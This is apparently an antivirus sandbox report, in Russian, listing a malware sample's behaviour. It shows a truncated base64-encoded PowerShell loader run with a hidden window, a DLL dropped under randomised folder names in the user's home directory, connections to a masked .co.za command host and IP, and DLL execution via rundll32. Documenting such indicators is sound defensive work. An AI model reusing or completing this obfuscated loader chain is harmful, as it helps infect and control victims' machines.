Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABRADkAdQA5AG4AbwBxAD0AKAAoACcASQAnACsAJwBoAHYAMgAyACcAKQArACcAZwA1ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdQBzAEUAcgBQAHIATwBmAGkATA...
- %HOMEPATH%\ymgvr3q\ht4czjj\fxnylujt.dll
- 'uf##o.co.za':443
- '14#.#64.126.197':443
- DNS ASK uf##o.co.za
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABRADkAdQA5AG4AbwBxAD0AKAAoACcASQAnACsAJwBoAHYAMgAyACcAKQArACcAZwA1ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdQBzAEUAcgBQAHIATwBmAGkATA...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Ymgvr3q\Ht4czjj\Fxnylujt.dll 0